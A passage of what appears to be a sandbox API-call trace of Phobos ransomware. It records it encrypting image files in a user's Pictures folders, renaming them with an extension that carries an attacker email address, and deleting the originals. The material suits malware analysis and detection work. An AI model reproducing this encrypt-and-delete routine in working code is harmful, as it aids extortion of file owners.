Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x11540, dwBufLen=0x11540 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x11540) returned 1 [0198.922] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x11540, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x11540, lpOverlapped=0x0) returned 1 [0199.028] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32aa8) returned 1 [0199.028] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.028] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0199.028] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.028] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0199.028] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.028] CloseHandle (hObject=0x140) returned 1 [0199.028] CloseHandle (hObject=0x130) returned 1 [0199.028] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\YWgQdDMFg.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\ywgqddmfg.bmp")) returned 1 [0199.034] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0199.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\j5LDL4Qw NI4SuWNeLc3.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\j5ldl4qw ni4suwnelc3.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.034] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=92099) returned 1 [0199.035] CloseHandle (hObject=0x140) returned 1 [0199.035] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\j5LDL4Qw NI4SuWNeLc3.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\j5ldl4qw ni4suwnelc3.gif")) returned 0x20 [0199.035] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\j5LDL4Qw NI4SuWNeLc3.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\j5ldl4qw ni4suwnelc3.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\j5LDL4Qw NI4SuWNeLc3.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\j5ldl4qw ni4suwnelc3.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.035] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.035] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\j5LDL4Qw NI4SuWNeLc3.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\j5ldl4qw ni4suwnelc3.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.036] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0199.036] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.036] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x167c3, lpOverlapped=0x0) returned 1 [0199.037] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x167d0, dwBufLen=0x167d0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x167d0) returned 1 [0199.038] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x167d0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x167d0, lpOverlapped=0x0) returned 1 [0199.040] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa328a8) returned 1 [0199.040] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.040] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60, dwBufLen=0x60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60) returned 1 [0199.040] CryptDestroyKey (hKey=0xa328a8) returned 1 [0199.040] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x112, lpOverlapped=0x0) returned 1 [0199.040] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.040] CloseHandle (hObject=0x140) returned 1 [0199.040] CloseHandle (hObject=0x174) returned 1 [0199.040] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\j5LDL4Qw NI4SuWNeLc3.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\j5ldl4qw ni4suwnelc3.gif")) returned 1 [0199.041] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0199.041] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\KHAg3aeSzIAQ7EZZfgDY.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\khag3aesziaq7ezzfgdy.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.042] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=76470) returned 1 [0199.042] CloseHandle (hObject=0x174) returned 1 [0199.042] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\KHAg3aeSzIAQ7EZZfgDY.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\khag3aesziaq7ezzfgdy.png")) returned 0x20 [0199.042] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\KHAg3aeSzIAQ7EZZfgDY.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\khag3aesziaq7ezzfgdy.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.042] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\KHAg3aeSzIAQ7EZZfgDY.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\khag3aesziaq7ezzfgdy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.042] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.042] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.042] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\KHAg3aeSzIAQ7EZZfgDY.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\khag3aesziaq7ezzfgdy.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.043] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0199.043] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.043] ReadFile (in: hFile=0x174, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x12ab6, lpOverlapped=0x0) returned 1 [0199.045] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x12ac0, dwBufLen=0x12ac0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x12ac0) returned 1 [0199.045] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x12ac0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x12ac0, lpOverlapped=0x0) returned 1 [0199.047] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa328a8) returned 1 [0199.047] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.047] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60, dwBufLen=0x60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60) returned 1 [0199.047] CryptDestroyKey (hKey=0xa328a8) returned 1 [0199.047] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x112, lpOverlapped=0x0) returned 1 [0199.047] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.047] CloseHandle (hObject=0x174) returned 1 [0199.047] CloseHandle (hObject=0x140) returned 1 [0199.047] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\KHAg3aeSzIAQ7EZZfgDY.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\khag3aesziaq7ezzfgdy.png")) returned 1 [0199.049] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0199.049] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\O-OkUkQHqEDooBPHu.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\o-okukqhqedoobphu.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.050] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=93569) returned 1 [0199.050] CloseHandle (hObject=0x140) returned 1 [0199.050] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\O-OkUkQHqEDooBPHu.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\o-okukqhqedoobphu.png")) returned 0x20 [0199.051] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\O-OkUkQHqEDooBPHu.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\o-okukqhqedoobphu.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\O-OkUkQHqEDooBPHu.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\o-okukqhqedoobphu.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.051] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.051] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\O-OkUkQHqEDooBPHu.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\o-okukqhqedoobphu.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.051] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0199.051] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.051] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x16d81, lpOverlapped=0x0) returned 1 [0199.053] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x16d90, dwBufLen=0x16d90 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x16d90) returned 1 [0199.054] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x16d90, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x16d90, lpOverlapped=0x0) returned 1 [0199.055] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa328a8) returned 1 [0199.055] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.056] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0199.056] CryptDestroyKey (hKey=0xa328a8) returned 1 [0199.056] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0199.056] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.056] CloseHandle (hObject=0x140) returned 1 [0199.056] CloseHandle (hObject=0x174) returned 1 [0199.056] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\O-OkUkQHqEDooBPHu.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\o-okukqhqedoobphu.png")) returned 1 [0199.057] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0199.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\7r71vg.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\7r71vg.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.059] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=6366) returned 1 [0199.059] CloseHandle (hObject=0x174) returned 1 [0199.059] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\7r71vg.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\7r71vg.jpg")) returned 0x20 [0199.059] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\7r71vg.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\7r71vg.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\7r71vg.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\7r71vg.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.059] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.059] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\7r71vg.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\7r71vg.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.060] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0199.060] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.060] ReadFile (in: hFile=0x174, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x18de, lpOverlapped=0x0) returned 1 [0199.069] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x18e0, dwBufLen=0x18e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x18e0) returned 1 [0199.069] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x18e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x18e0, lpOverlapped=0x0) returned 1 [0199.070] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa328a8) returned 1 [0199.070] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.070] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0199.070] CryptDestroyKey (hKey=0xa328a8) returned 1 [0199.070] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0199.070] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.070] CloseHandle (hObject=0x174) returned 1 [0199.070] CloseHandle (hObject=0x140) returned 1 [0199.070] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\7r71vg.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\7r71vg.jpg")) returned 1 [0199.071] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0199.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\a0ufU.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\a0ufu.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.072] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49221) returned 1 [0199.072] CloseHandle (hObject=0x140) returned 1 [0199.072] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\a0ufU.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\a0ufu.png")) returned 0x20 [0199.072] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\a0ufU.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\a0ufu.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.072] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\a0ufU.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\a0ufu.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.072] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.072] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.072] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\a0ufU.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\a0ufu.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.073] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0199.073] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.073] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xc045, lpOverlapped=0x0) returned 1 [0199.185] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc050, dwBufLen=0xc050 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc050) returned 1 [0199.185] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc050, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc050, lpOverlapped=0x0) returned 1 [0199.187] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0199.187] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.187] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, 